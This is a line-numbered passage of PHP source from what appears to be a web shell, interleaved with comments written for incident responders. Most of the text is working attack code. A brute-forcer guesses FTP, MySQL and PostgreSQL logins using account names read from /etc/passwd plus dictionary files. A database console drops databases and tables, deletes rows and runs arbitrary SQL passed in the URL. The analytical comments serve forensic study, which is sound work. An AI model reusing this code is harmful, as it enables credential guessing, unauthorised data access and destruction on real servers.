3962 echo '<h1>Results</h1><div><span>Type:</span> '.htmlspecialchars($_GET['prototype']).' <span><br>Server:</span> '.htmlspecialchars($_GET['serverport']).'<br>';
3963 if( $_GET['prototype'] == 'ftp' )
3964 {
 // FTP variant: returns the ftp_login() result, or false when the connection fails;
 // the port falls back to 21 when none is given. Warnings are suppressed with @.
3965 function BruteFun($ip,$port,$login,$pass)
3966 {
3967 $fp = @ftp_connect($ip, $port?$port:21);
3968 if(!$fp) return false;
3969 $res = @ftp_login($fp, $login, $pass);
3970 @ftp_close($fp);
3971 return $res;
3972 }
3973 }
3974 elseif( $_GET['prototype'] == 'mysql' )
3975 {
 // MySQL variant: returns whatever mysql_connect() returned for $login/$pass; the first argument
 // is an expression built from $ip and $port. Uses the legacy mysql_* API removed in PHP 7.0.
3976 function BruteFun($ip,$port,$login,$pass)
3977 {
3978 $res = @mysql_connect($ip.':'.$port?$port:3306, $login, $pass);
3979 @mysql_close($res);
3980 return $res;
3981 }
3982 }
3983 elseif( $_GET['prototype'] == 'pgsql' )
3984 {
 // PostgreSQL variant: builds a connection string for database "postgres" from the arguments
 // and returns the pg_connect() result.
3985 function BruteFun($ip,$port,$login,$pass)
3986 {
3987 $str = "host='".$ip."' port='".$port."' user='".$login."' password='".$pass."' dbname=postgres";
3988 $res = @pg_connect($str);
3989 @pg_close($res);
3990 return $res;
3991 }
3992 }
3993
3994 $success = 0;
3995 $attempts = 0;
 // `server` is split on ":" into host ([0]) and port ([1]).
3996 $server = explode(":", $_GET['server']);
3997 if($_GET['type'] == 1)
3998 {
 // Candidate names come from the local /etc/passwd of the compromised host.
3999 $temp = @file('/etc/passwd');
4000 if( is_array($temp))
4001 foreach($temp as $line)
4002 {
4003 $line = explode(":", $line);
4004 ++$attempts;
 // Attempt 1: account name used as its own password.
4005 if(BruteFun(@$server[0],@$server[1], $line[0], $line[0]) )
4006 {
4007 $success++;
4008 echo '<b>'.htmlspecialchars($line[0]).'</b>:'.htmlspecialchars($line[0]).'<br>';
4009 }
4010 if(@$_GET['reverse'])
4011 {
 // Attempt 2: the account name spelled backwards as the password.
4012 $tmp = "";
4013 for($i=strlen($line[0])-1; $i>=0; --$i)
4014 $tmp .= $line[0][$i];
4015 ++$attempts;
4016 if(BruteFun(@$server[0],@$server[1], $line[0], $tmp) )
4017 {
4018 $success++;
4019 echo '<b>'.htmlspecialchars($line[0]).'</b>:'.htmlspecialchars($tmp);
4020 }
4021 }
4022 }
4023 }
4024 elseif($_GET['type'] == 2)
4025 {
 // Dictionary mode: the word list is read from a server-side path supplied in the request.
4026 $temp = @file($_GET['dict']);
4027 if( is_array($temp) )
4028 foreach($temp as $line)
4029 {
4030 $line = trim($line);
4031 ++$attempts;
4032 if(BruteFun($server[0],@$server[1], $_GET['login'], $line) )
4033 {
4034 $success++;
4035 echo '<b>'.htmlspecialchars($_GET['login']).'</b>:'.htmlspecialchars($line).'<br>';
4036 }
4037 }
4038 }
4039 echo "<span>Attempts:</span> <font class=txt>$attempts</font> <span>Success:</span> <font class=txt>$success</font></div>";
4040}
4041// Database login (?executeit): connects with the server/username/password taken from the query string
// and, on success, stores all three in cookies before calling listdatabase() (defined outside this
// part of the file).
// For responders: the dbserver/dbuser/dbpass cookies carry the credentials in clear text on every
// later request, and the initial login puts them in the URL, so access and proxy logs from the
// incident may hold working database credentials that need rotating.
4042else if(isset($_GET["executeit"]))
4043{
4044 if(isset($_GET['username']) && isset($_GET['server']))
4045 {
4046 $dbserver = $_GET['server'];
4047 $dbuser = $_GET['username'];
4048 $dbpass = $_GET['password'];
4049 if(mysql_connect($dbserver,$dbuser,$dbpass))
4050 {
 // setcookie() is called with name and value only: no expiry, path or flag arguments are passed.
4051 setcookie("dbserver", $dbserver);
4052 setcookie("dbuser", $dbuser);
4053 setcookie("dbpass", $dbpass);
4054
4055 listdatabase();
4056 }
4057 else
4058 echo "cannotconnect";
4059 }
4060}
4061else if(isset($_GET['action']) && isset($_GET['dbname']))
4062
4063
4064 {
// createDB: reconnects with the cookie-held credentials and creates the database named in the query
// string; $dbname is interpolated into the statement as-is. An unexpected, newly created database on
// the server is the artifact this leaves.
4065 if($_GET['action'] == "createDB")
4066 {
4067 $dbname = $_GET['dbname'];
4068 $dbserver = $_COOKIE["dbserver"];
4069 $dbuser = $_COOKIE["dbuser"];
4070 $dbpass = $_COOKIE["dbpass"];
4071 $mysqlHandle = mysql_connect($dbserver, $dbuser, $dbpass);
4072 mysql_query("create database $dbname",$mysqlHandle);
4073 listdatabase();
4074 }
// dropDB: reconnects with the cookie-held credentials and drops the database named in the query string
// ($dbname is interpolated as-is), then closes the link and re-lists databases. Destructive: recovery
// depends on backups or binary logs taken before the request.
4075 if($_GET['action'] == 'dropDB')
4076 {
4077 $dbname = $_GET['dbname'];
4078 $dbserver = $_COOKIE["dbserver"];
4079 $dbuser = $_COOKIE["dbuser"];
4080 $dbpass = $_COOKIE["dbpass"];
4081 $mysqlHandle = mysql_connect($dbserver, $dbuser, $dbpass);
4082 mysql_query("drop database $dbname",$mysqlHandle);
4083 mysql_close($mysqlHandle);
4084 listdatabase();
4085 }
4086
// listTables: delegates to listtable(), which is defined outside this part of the file.
4087 if($_GET['action'] == 'listTables')
4088 {
4089 listtable();
4090 }
4091
4092 // Create Tables: connects with the cookie-held credentials, selects the database from the query
 // string and creates a table with a single INT column named "no". $tablename is interpolated as-is.
4093 if($_GET['action'] == "createtable")
4094 {
4095 $dbserver = $_COOKIE["dbserver"];
4096 $dbuser = $_COOKIE["dbuser"];
4097 $dbpass = $_COOKIE["dbpass"];
4098 $dbname = $_GET['dbname'];
4099 $tablename = $_GET['tablename'];
4100 $mysqlHandle = mysql_connect ($dbserver, $dbuser, $dbpass);
4101 mysql_select_db($dbname);
4102 mysql_query("CREATE TABLE $tablename ( no INT )");
4103 listtable();
4104 }
4105
4106 // Drop Tables: connects with the cookie-held credentials and drops the table named in the query
 // string ($tablename is interpolated as-is). Destructive; the request's `tablename` value in the
 // access log tells responders which table was removed.
4107 if($_GET['action'] == "dropTable")
4108 {
4109 $dbserver = $_COOKIE["dbserver"];
4110 $dbuser = $_COOKIE["dbuser"];
4111 $dbpass = $_COOKIE["dbpass"];
4112 $dbname = $_GET['dbname'];
4113 $tablename = $_GET['tablename'];
4114 $mysqlHandle = mysql_connect ($dbserver, $dbuser, $dbpass);
4115 mysql_select_db($dbname);
4116 mysql_query("drop table $tablename");
4117 listtable();
4118 }
4119
4120 // Empty Tables: connects with the cookie-held credentials and deletes every row of the table named
 // in the query string (DELETE without a WHERE clause; $tablename is interpolated as-is).
4121 if($_GET['action'] == "empty")
4122 {
4123 $dbserver = $_COOKIE["dbserver"];
4124 $dbuser = $_COOKIE["dbuser"];
4125 $dbpass = $_COOKIE["dbpass"];
4126 $dbname = $_GET['dbname'];
4127 $tablename = $_GET['tablename'];
4128 $mysqlHandle = mysql_connect ($dbserver, $dbuser, $dbpass);
4129 mysql_select_db($dbname);
4130 mysql_query("delete from $tablename");
4131 listtable();
4132 }
4133
4134 // Drop Field: connects with the cookie-held credentials and removes one column from a table.
 // Table and column names come from the query string and are interpolated into the ALTER TABLE
 // statement as-is.
4135 if($_GET['action'] == "dropField")
4136 {
4137 $dbserver = $_COOKIE["dbserver"];
4138 $dbuser = $_COOKIE["dbuser"];
4139 $dbpass = $_COOKIE["dbpass"];
4140 $dbname = $_GET['dbname'];
4141 $tablename = $_GET['tablename'];
4142 $fieldname = $_GET['fieldname'];
4143 $mysqlHandle = mysql_connect ($dbserver, $dbuser, $dbpass);
4144 mysql_select_db($dbname);
4145 $queryStr = "ALTER TABLE $tablename DROP COLUMN $fieldname";
 // The database is selected a second time, this time with the explicit link handle.
4146 mysql_select_db( $dbname, $mysqlHandle );
4147 mysql_query( $queryStr , $mysqlHandle );
4148 listtable();
4149 }
4150
// viewdb: delegates to listdatabase(), which is defined outside this part of the file.
4151 if($_GET['action'] == 'viewdb')
4152 {
4153 listdatabase();
4154 }
4155
4156 // View Table Schema
4157 if($_GET['action'] == "viewSchema")
4158 {
4159 $dbserver = $_COOKIE["dbserver"];
4160 $dbuser = $_COOKIE["dbuser"];
4161 $dbpass = $_COOKIE["dbpass"];
4162 $dbname = $_GET['dbname'];
4163 $tablename = $_GET['tablename'];
4164 $mysqlHandle = mysql_connect ($dbserver, $dbuser, $dbpass);
4165 mysql_select_db($dbname);
4166 echo "<br><div><font color=white size=3>[ $dbname ]</font> - <font color=white size=3>></font> <a href=# onClick=\"viewtables('viewdb')\"> <font size=3>Database List</font> </a> <font color=white size=3>></font> <a href=# onClick=\"viewtables('listTables','$dbname','$tablename')\"> <font size=3>Table List</font> </a> <a href=$self?logoutdb> <font size=3>[ Log Out ]</font> </a></div>";
4167 $pResult = mysql_query( "SHOW fields FROM $tablename" );
4168 $num = mysql_num_rows( $pResult );
4169 echo "<br><br><table align=center cellspacing=4 style='width:80%;' border=1>";
4170 echo "<th>Field</th><th>Type</th><th>Null</th><th>Key</th></th>";
4171 for( $i = 0; $i < $num; $i++ )
4172 {
4173 $field = mysql_fetch_array( $pResult );
4174 echo "<tr>\n";
4175 echo "<td>".$field["Field"]."</td>\n";
4176 echo "<td>".$field["Type"]."</td>\n";
4177 echo "<td>".$field["Null"]."</td>\n";
4178 echo "<td>".$field["Key"]."</td>\n";
4179 echo "<td>".$field["Default"]."</td>\n";
4180 echo "<td>".$field["Extra"]."</td>\n";
4181 $fieldname = $field["Field"];
4182 echo "<td><a href=# onClick=\"viewtables('dropField','$dbname','$tablename','','','','$fieldname')\">Drop</a></td>\n";
4183 echo "</tr>\n";
4184 }
4185 echo "</table>";
4186 echo "<div><font color=white size=3>[ $dbname ]</font> - <font color=white size=3>></font> <a href=# onClick=\"viewtables('viewdb')\"> <font size=3>Database List</font> </a> <font color=white size=3>></font> <a href=# onClick=\"viewtables('listTables','$dbname','$tablename')\"> <font size=3>Table List</font> </a> <a href=$self?logoutdb> <font size=3>[ Log Out ]</font> </a></div>";
4187 }
4188
4189 // Execute Query: connects with the cookie-held credentials, selects the database from the query
 // string and runs the `executemyquery` parameter verbatim as SQL, then renders the result set.
 // For responders: because the statement travels in the query string, web access logs keep the SQL
 // the operator ran, which helps scope what data was read or changed.
4190 if($_GET['action'] == "executequery")
4191 {
4192 $dbserver = $_COOKIE["dbserver"];
4193 $dbuser = $_COOKIE["dbuser"];
4194 $dbpass = $_COOKIE["dbpass"];
4195 $dbname = $_GET['dbname'];
4196 $tablename = $_GET['tablename'];
4197 $mysqlHandle = mysql_connect ($dbserver, $dbuser, $dbpass);
4198 mysql_select_db($dbname);
4199 $result = mysql_query($_GET['executemyquery']);
4200
4201 // results
 // The query text is echoed back upper-cased and without HTML escaping.
4202 echo "<html>\r\n". strtoupper($_GET['executemyquery']) . "<br>\r\n<table border =\"1\">\r\n";
4203
4204 $count = 0;
4205 while ($row = mysql_fetch_assoc($result))
4206 {
4207 echo "<tr>\r\n";
4208
4209 if ($count==0) // list column names
4210 {
4211 echo "<tr>\r\n";
 // Walks the first row's keys with key()/next(); the loop ends at the first falsy key.
4212 while($key = key($row))
4213 {
4214 echo "<td><b>" . $key . "</b></td>\r\n";
4215 next($row);
4216 }
4217 echo "</tr>\r\n";
4218 }
4219
4220 foreach($row as $r) // list content of column names
4221 {
 // Loose comparison: empty strings and NULLs are both shown as "NULL". Cell values are
 // written into the page without HTML escaping.
4222 if ($r=='') $r = '<font >NULL</font>';
4223 echo "<td><font class=txt>" . $r . "</font></td>\r\n";
4224 }
4225 echo "</tr>\r\n";
4226 $count++;
4227 }
4228 echo "</table>\n\r<font class=txt size=3>" . $count . " rows returned.</font>\r\n</html>";
4229 echo "<div><font color=white size=3>[ $dbname ]</font> - <font color=white size=3>></font> <a href=# onClick=\"viewtables('viewdb')\"> <font size=3>Database List</font> </a> <font color=white size=3>></font> <a href=# onClick=\"viewtables('listTables','$dbname','$tablename')\"> <font size=3>Table List</font> </a> <a href=$self?logoutdb> <font size=3>[ Log Out ]</font> </a></div>";
4230 }
4231
4232 // View Table Data
4233 if($_GET['action'] == "viewdata")
4234 {
4235 global $queryStr, $action, $mysqlHandle, $dbname, $tablename, $PHP_SELF, $errMsg, $page, $rowperpage, $orderby, $data;
4236 $dbserver = $_COOKIE["dbserver"];
4237 $dbuser = $_COOKIE["dbuser"];
4238 $dbpass = $_COOKIE["dbpass"];
4239 $dbname = $_GET['dbname'];
4240 $tablename = $_GET['tablename'];
4241 echo "<br><div><font color=white size=3>[ $dbname ]</font> - <font color=white size=3>></font> <a href=# onClick=\"viewtables('viewdb')\"> <font size=3>Database List</font> </a> <font color=white size=3>></font> <a href=# onClick=\"viewtables('listTables','$dbname','$tablename')\"> <font size=3>Table List</font> </a> <a href=$self?logoutdb> <font size=3>[ Log Out ]</font> </a></div>";
4242 ?>
4243 <br><br>
4244 <form>
4245 <table>
4246 <tr>
4247 <td><textarea cols="60" rows="7" name="executemyquery" class="box">Execute Query..</textarea></td>
4248 </tr>
4249 <tr>
4250 <td><input type="button" onClick="viewtables('executequery','<?php echo $_GET['dbname'];?>','<?php echo $_GET['tablename']; ?>','','',executemyquery.value)" value="Execute" class="but"></td>
4251 </tr>
4252 </table>
4253 </form>
4254 <?php
4255 $mysqlHandle = mysql_connect ($dbserver, $dbuser, $dbpass);
4256 mysql_select_db($dbname);
4257
4258 $sql = mysql_query("SELECT `COLUMN_NAME` FROM `information_schema`.`COLUMNS` WHERE (`TABLE_SCHEMA` = '$dbname') AND (`TABLE_NAME` = '$tablename') AND (`COLUMN_KEY` = 'PRI');");
4259 $row = mysql_fetch_array($sql);
4260 $rowid = $row['COLUMN_NAME'];
4261
4262 echo "<br><font size=4 color =lime>Data in Table</font><br>";
4263 if( $tablename != "" )
4264 echo "<font size=3 class=txt>$dbname > $tablename</font><br>";
4265 else
4266 echo "<font size=3 class=txt>$dbname</font><br>";
4267
4268 $queryStr = "";
4269 $pag = 0;
4270 $queryStr = stripslashes( $queryStr );
4271 if( $queryStr == "" )
4272 {
4273 if(isset($_REQUEST['page']))
4274 {
4275 $res = mysql_query("select * from $tablename");
4276 $getres = mysql_num_rows($res);
4277 $coun = ceil($getres/30);
4278 if($_REQUEST['page'] != 1)
4279
4280 $pag = $_REQUEST['page'] * 30;
4281 else
4282 $pag = $_REQUEST['page'] * 30;
4283
4284 $queryStr = "SELECT * FROM $tablename LIMIT $pag,30";
4285 $sql = mysql_query("SELECT $rowid FROM $tablename ORDER BY $rowid LIMIT $pag,30");
4286 $arrcount = 1;
4287 $arrdata[$arrcount] = 0;
4288 while($row = mysql_fetch_array($sql))
4289 {
4290 $arrdata[$arrcount] = $row[$rowid];
4291 $arrcount++;
4292 }
4293 }
4294 else
4295 {
4296 $queryStr = "SELECT * FROM $tablename LIMIT 0,30";
4297 $sql = mysql_query("SELECT $rowid FROM $tablename ORDER BY $rowid LIMIT 0,30");
4298 $arrcount = 1;
4299 $arrdata[$arrcount] = 0;
4300 while($row = mysql_fetch_array($sql))
4301 {
4302 $arrdata[$arrcount] = $row[$rowid];
4303 $arrcount++;
4304 }
4305 }
4306 if( $orderby != "" )
4307 $queryStr .= " ORDER BY $orderby";
4308 echo "<a href=# onClick=\"viewtables('viewSchema','$dbname','$tablename')\"><font size=3>Schema</font></a>\n";
4309 }
4310
4311
4312 $pResult = mysql_query($queryStr );
4313 $fieldt = mysql_fetch_field($pResult);
4314 $tablename = $fieldt->table;
4315 $errMsg = mysql_error();
4316
4317 $GLOBALS[queryStr] = $queryStr;
4318
4319 if( $pResult == false )
4320 {
4321 echoQueryResult();
4322 return;
4323 }
4324 if( $pResult == 1 )
4325 {
4326 $errMsg = "Success";
4327 echoQueryResult();
4328 return;
4329 }
4330
4331 echo "<hr color='#1B1B1B'>\n";
4332
4333 $row = mysql_num_rows( $pResult );
4334 $col = mysql_num_fields( $pResult );
4335
4336 if( $row == 0 )
4337 {
4338 echo "<font size=3>No Data Exist!</font>";
4339 return;
4340 }
4341
4342 if( $rowperpage == "" ) $rowperpage = 30;
4343 if( $page == "" ) $page = 0;
4344 else $page--;
4345 mysql_data_seek( $pResult, $page * $rowperpage );
4346
4347 echo "<table cellspacing=1 cellpadding=5 border=1 align=center>\n";
4348 echo "<tr>\n";
4349 for( $i = 0; $i < $col; $i++ )
4350 {
4351 $field = mysql_fetch_field( $pResult, $i );
4352 echo "<th>";
4353 if($action == "viewdata")
4354 echo "<a href='$PHP_SELF?action=viewdata&dbname=$dbname&tablename=$tablename&orderby=".$field->name."'>".$field->name."</a>\n";
4355 else
4356 echo $field->name."\n";
4357 echo "</th>\n";
4358 }
4359 echo "<th colspan=2>Action</th>\n";
4360 echo "</tr>\n";
4361 $num=1;
4362
4363
4364 $acount = 1;
4365
4366 for( $i = 0; $i < $rowperpage; $i++ )
4367 {
4368 $rowArray = mysql_fetch_row( $pResult );
4369 if( $rowArray == false ) break;
4370 echo "<tr>\n";
4371 $key = "";
4372 for( $j = 0; $j < $col; $j++ )
4373 {
4374 $data = $rowArray[$j];
4375
4376 $field = mysql_fetch_field( $pResult, $j );
4377 if( $field->primary_key == 1 )
4378 $key .= "&" . $field->name . "=" . $data;
4379
4380 if( strlen( $data ) > 30 )
4381 $data = substr( $data, 0, 30 ) . "...";
4382 $data = htmlspecialchars( $data );
4383 echo "<td>\n";
4384 echo "<font class=txt>$data</font>\n";
4385 echo "</td>\n";
4386 }
4387
4388 if(!is_numeric($arrdata[$acount]))
4389 echo "<td colspan=2>No Key</td>\n";
4390 else
4391 {
4392 echo "<td><a href=# onClick=\"viewtables('editData','$dbname','$tablename','$rowid','$arrdata[$acount]')\">Edit</a></td>\n";
4393 echo "<td><a href=# onClick=\"viewtables('deleteData','$dbname','$tablename','$rowid','$arrdata[$acount]')\">Delete</a></td>\n";
4394 $acount++;
4395 }
4396 }
4397 echo "</tr>\n";
4398
4399
4400 echo "</table>";
4401 if($arrcount > 30)
4402 {
4403 $res = mysql_query("select * from $tablename");
4404 $getres = mysql_num_rows($res);
4405 $coun = ceil($getres/30);
4406 echo "<form action=$self><input type=hidden value=viewdata name=action><input type=hidden name=tablename value=$tablename><input type=hidden value=$dbname name=dbname><select style='width: 95px;' name=page class=sbox>";
4407 for($i=0;$i<$coun;$i++)
4408 echo "<option value=$i>$i</option>";
4409
4410 echo "</select> <input type=button onClick=\"viewtables('viewdata','$dbname','$tablename','','','','',page.value)\" value=Go class=but></form>";
4411 echo "<br><div><font color=white size=3>[ $dbname ]</font> - <font color=white size=3>></font> <a href=# onClick=\"viewtables('viewdb')\"> <font size=3>Database List</font> </a> <font color=white size=3>></font> <a href=# onClick=\"viewtables('listTables','$dbname','$tablename')\"> <font size=3>Table List</font> </a> <a href=$self?logoutdb> <font size=3>[ Log Out ]</font> </a></div>";
4412 }
4413 }
4414
4415 // Delete Table Data
 // Handler for ?action=deleteData. Connects to MySQL with the server, user and
 // password read from the dbserver/dbuser/dbpass cookies, looks up the table's
 // primary-key column in information_schema, deletes the row whose key value
 // arrives in the query string under that column's name, then calls listtable().
 // NOTE(review): dbname, tablename and the key value come straight from the
 // request and are interpolated into the SQL text; no authentication or input
 // validation is visible in this block.
 // NOTE(review): the mysql_* extension was removed in PHP 7.0, so this path can
 // only execute on older PHP builds.
4416 if($_GET['action'] == "deleteData")
4417 {
4418 $dbserver = $_COOKIE["dbserver"];
4419 $dbuser = $_COOKIE["dbuser"];
4420 $dbpass = $_COOKIE["dbpass"];
4421 $dbname = $_GET['dbname'];
4422 $tablename = $_GET['tablename'];
4423 $mysqlHandle = mysql_connect ($dbserver, $dbuser, $dbpass);
4424 mysql_select_db($dbname);
 // Find the column flagged as primary key for this schema/table.
4425 $sql = mysql_query("SELECT `COLUMN_NAME` FROM `information_schema`.`COLUMNS` WHERE (`TABLE_SCHEMA` = '$dbname') AND (`TABLE_NAME` = '$tablename') AND (`COLUMN_KEY` = 'PRI');");
4426 $row = mysql_fetch_array($sql);
 // $row is reused: from here on it holds the key column's name, and the
 // request parameter of that same name supplies the key value.
4427 $row = $row['COLUMN_NAME'];
4428 $rowid = $_GET[$row];
4429 mysql_query("delete from $tablename where $row = '$rowid'");
4430 listtable();
4431 }
4432 // Edit Table Data
 // Handler for ?action=editData. Renders an HTML form for one table row: it
 // connects to MySQL with credentials taken from cookies, finds the primary-key
 // column, selects the row whose key value is passed in the query string, and
 // prints one input per column plus "Edit Data" / "Insert" buttons that call the
 // client-side editdata() helper.
 // NOTE(review): dbname, tablename and the key value are request-controlled and
 // are placed into SQL and into HTML/inline JavaScript without escaping; only
 // the column values are passed through htmlspecialchars().
 // NOTE(review): mysql_* and eregi_replace() were removed in PHP 7.0, so this
 // branch can only execute on older PHP builds.
4433 if($_GET['action'] == "editData")
4434 {
4435 global $queryStr, $action, $mysqlHandle, $dbname, $tablename, $PHP_SELF, $errMsg, $page, $rowperpage, $orderby, $data;
4436 $dbserver = $_COOKIE["dbserver"];
4437 $dbuser = $_COOKIE["dbuser"];
4438 $dbpass = $_COOKIE["dbpass"];
4439 $dbname = $_GET['dbname'];
4440 $tablename = $_GET['tablename'];
 // Navigation bar; $dbname and $tablename are echoed as received.
4441 echo "<br><div><font color=white size=3>[ $dbname ]</font> - <font color=white size=3>></font> <a href=# onClick=\"viewtables('viewdb')\"> <font size=3>Database List</font> </a> <font color=white size=3>></font> <a href=# onClick=\"viewtables('listTables','$dbname','$tablename')\"> <font size=3>Table List</font> </a> <a href=$self?logoutdb> <font size=3>[ Log Out ]</font> </a></div>";
4442 ?>
4443 <br><br>
4444 <form action="<?php echo $self; ?>" method="post">
4445 <?php
4446 $mysqlHandle = mysql_connect ($dbserver, $dbuser, $dbpass);
4447 mysql_select_db($dbname);
4448
 // Primary-key column name, then its value from the query string.
4449 $sql = mysql_query("SELECT `COLUMN_NAME` FROM `information_schema`.`COLUMNS` WHERE (`TABLE_SCHEMA` = '$dbname') AND (`TABLE_NAME` = '$tablename') AND (`COLUMN_KEY` = 'PRI');");
4450 $row = mysql_fetch_array($sql);
4451 $row = $row['COLUMN_NAME'];
4452 $rowid = $_GET[$row];
4453
4454 $pResult = mysql_list_fields( $dbname, $tablename );
4455 $num = mysql_num_fields( $pResult );
4456
 // Builds a "col=value AND ..." string from globals named after the key
 // columns. $key is not referenced again in this block.
4457 $key = "";
4458 for( $i = 0; $i < $num; $i++ )
4459 {
4460 $field = mysql_fetch_field( $pResult, $i );
4461 if( $field->primary_key == 1 )
4462 if( $field->numeric == 1 )
4463 $key .= $field->name . "=" . $GLOBALS[$field->name] . " AND ";
4464 else
4465 $key .= $field->name . "='" . $GLOBALS[$field->name] . "' AND ";
4466 }
4467 $key = substr( $key, 0, strlen($key)-4 );
4468
4469 mysql_select_db( $dbname, $mysqlHandle );
 // The key value is inserted into the WHERE clause unquoted.
4470 $pResult = mysql_query( $queryStr = "SELECT * FROM $tablename WHERE $row = $rowid", $mysqlHandle );
4471 $data = mysql_fetch_array( $pResult );
4472
4473 echo "<table cellspacing=1 cellpadding=2 border=1>\n";
4474 echo "<tr>\n";
4475 echo "<th>Name</th>\n";
4476 echo "<th>Type</th>\n";
4477 echo "<th>Function</th>\n";
4478 echo "<th>Data</th>\n";
4479 echo "</tr>\n";
4480
4481 $pResult = mysql_db_query( $dbname, "SHOW fields FROM $tablename" );
4482 $num = mysql_num_rows( $pResult );
4483
4484 $pResultLen = mysql_list_fields( $dbname, $tablename );
 // Argument lists for the JavaScript editdata() call: alternating parameter
 // names and values, one list per target action.
4485 $fundata1 = "'action','editsubmitData','dbname','".$dbname."','tablename','".$tablename."',";
4486 $fundata2 = "'action','insertdata','dbname','".$dbname."','tablename','".$tablename."',";
4487 for( $i = 0; $i < $num; $i++ )
4488 {
4489 $field = mysql_fetch_array( $pResult );
4490 $fieldname = $field["Field"];
4491 $fieldtype = $field["Type"];
4492 $len = mysql_field_len( $pResultLen, $i );
4493
4494 echo "<tr>";
4495 echo "<td>$fieldname</td>";
4496 echo "<td>".$field["Type"]."</td>";
4497 echo "<td>\n";
 // Drop-down of SQL function names, submitted as <field>_function.
4498 echo "<select name=${fieldname}_function class=sbox>\n";
4499 echo "<option>\n";
4500 echo "<option>ASCII\n";
4501 echo "<option>CHAR\n";
4502 echo "<option>SOUNDEX\n";
4503 echo "<option>CURDATE\n";
4504 echo "<option>CURTIME\n";
4505 echo "<option>FROM_DAYS\n";
4506 echo "<option>FROM_UNIXTIME\n";
4507 echo "<option>NOW\n";
4508 echo "<option>PASSWORD\n";
4509 echo "<option>PERIOD_ADD\n";
4510 echo "<option>PERIOD_DIFF\n";
4511 echo "<option>TO_DAYS\n";
4512 echo "<option>USER\n";
4513 echo "<option>WEEKDAY\n";
4514 echo "<option>RAND\n";
4515 echo "</select>\n";
4516 echo "</td>\n";
 // Current column value, HTML-escaped before it is printed.
4517 $value = htmlspecialchars($data[$i]);
 // First token of the column type, e.g. "enum" from "enum('a','b')".
4518 $type = strtok( $fieldtype, " (,)\n" );
4519 if( $type == "enum" || $type == "set" )
4520 {
4521 echo "<td>\n";
4522 if( $type == "enum" )
4523 echo "<select name=$fieldname class=box>\n";
4524 else if( $type == "set" )
4525 echo "<select name=$fieldname size=4 class=box multiple>\n";
 // Continues the strtok() scan started above, splitting on single quotes
 // to list the allowed enum/set values; the extra strtok() call skips the
 // text between two quoted values.
4526 while( $str = strtok( "'" ) )
4527 {
4528 if( $value == $str )
4529 echo "<option selected>$str\n";
4530 else
4531 echo "<option>$str\n";
4532 strtok( "'" );
4533 }
4534 echo "</select>\n";
4535 echo "</td>\n";
4536 }
4537 else
4538 {
 // Short columns get a text input (id dhanush_<field>, name sql_<field>);
 // longer ones get a textarea named dhanush_<field>.
4539 if( $len < 40 )
4540 echo "<td><input type=text size=40 maxlength=$len id=dhanush_$fieldname name=sql_$fieldname value=\"$value\" class=box></td>\n";
4541 else
4542 echo "<td><textarea cols=47 rows=3 maxlength=$len name=dhanush_$fieldname class=box>$value</textarea>\n";
4543 }
 // Append "'dhanush_<field>',dhanush_<field>.value," so the browser passes
 // the live form value to editdata().
4544 $fundata1 .= "'dhanush_".$fieldname."',dhanush_".$fieldname.".value,";
4545 $fundata2 .= "'dhanush_".$fieldname."',dhanush_".$fieldname.".value,";
4546 echo "</tr>";
4547 }
 // Strip the trailing comma from both argument lists.
4548 $fundata1=eregi_replace(',$', '', $fundata1);
4549 $fundata2=eregi_replace(',$', '', $fundata2);
4550
4551 echo "</table><p>\n";
4552 echo "<input type=button onClick=\"editdata($fundata1)\" value='Edit Data' class=but>\n";
4553 echo "<input type=button value='Insert' onClick=\"editdata($fundata2)\" class=but>\n";
4554 echo "</form>\n";
4555 }
4556 }
4557// Edit Submit Table Data
// Handler for action=editsubmitData. Connects to MySQL with cookie-supplied
// credentials, finds the table's primary-key column, then builds and runs one
// UPDATE statement that sets every column of the table to the request value of
// the same name, for the row whose key value was posted.
// NOTE(review): table name, column values and key value are all taken from the
// request and concatenated into the SQL text without escaping; no
// authentication check is visible in this block.
// NOTE(review): $str is appended to without being initialised in this block.
4558else if($_REQUEST['action'] == "editsubmitData")
4559{
4560 $dbserver = $_COOKIE["dbserver"];
4561 $dbuser = $_COOKIE["dbuser"];
4562 $dbpass = $_COOKIE["dbpass"];
4563 $dbname = $_POST['dbname'];
4564 $tablename = $_POST['tablename'];
4565
4566 $mysqlHandle = mysql_connect ($dbserver, $dbuser, $dbpass);
4567 mysql_select_db($dbname);
4568
 // Primary-key column name, then its posted value.
4569 $sql = mysql_query("SELECT `COLUMN_NAME` FROM `information_schema`.`COLUMNS` WHERE (`TABLE_SCHEMA` = '$dbname') AND (`TABLE_NAME` = '$tablename') AND (`COLUMN_KEY` = 'PRI');");
4570 $row = mysql_fetch_array($sql);
4571 $row = $row['COLUMN_NAME'];
4572 $rowid = $_POST[$row];
4573
4574 $pResult = mysql_db_query( $dbname, "SHOW fields FROM $tablename" );
4575 $num = mysql_num_rows( $pResult );
4576
 // Countdown used to decide whether a comma follows the current assignment.
4577 $rowcount = $num;
4578
4579 $pResultLen = mysql_list_fields( $dbname, $tablename );
4580
4581 for( $i = 0; $i < $num; $i++ )
4582 {
4583 $field = mysql_fetch_array( $pResult );
4584 $fieldname = $field["Field"];
4585 $arrdata = $_REQUEST[$fieldname];
4586
4587 $str .= " " . $fieldname . " = '" . $arrdata . "'";
4588 $rowcount--;
4589 if($rowcount != 0)
4590 $str .= ",";
4591 }
4592
 // The key value is placed in the WHERE clause unquoted.
4593 $str = "update $tablename set" . $str . " where $row=$rowid";
4594 mysql_query($str);
4595 ?><div id="showsql"></div><?php
4596}
4597// Insert Table Data
// Handler for action=insertdata. Connects to MySQL with cookie-supplied
// credentials and runs one INSERT whose column list is every column of the
// table and whose values are the request parameters of the same names.
// NOTE(review): table name and values come from the request and are
// concatenated into the SQL text without escaping; no authentication check is
// visible in this block.
// NOTE(review): $row/$rowid are computed but not used by the INSERT; $str1 and
// $str2 are appended to without being initialised in this block.
4598else if($_REQUEST['action'] == "insertdata")
4599{
4600 $dbserver = $_COOKIE["dbserver"];
4601 $dbuser = $_COOKIE["dbuser"];
4602 $dbpass = $_COOKIE["dbpass"];
4603 $dbname = $_POST['dbname'];
4604 $tablename = $_POST['tablename'];
4605
4606 $mysqlHandle = mysql_connect ($dbserver, $dbuser, $dbpass);
4607 mysql_select_db($dbname);
4608
4609 $sql = mysql_query("SELECT `COLUMN_NAME` FROM `information_schema`.`COLUMNS` WHERE (`TABLE_SCHEMA` = '$dbname') AND (`TABLE_NAME` = '$tablename') AND (`COLUMN_KEY` = 'PRI');");
4610 $row = mysql_fetch_array($sql);
4611 $row = $row['COLUMN_NAME'];
4612 $rowid = $_POST[$row];
4613
4614 $pResult = mysql_db_query( $dbname, "SHOW fields FROM $tablename" );
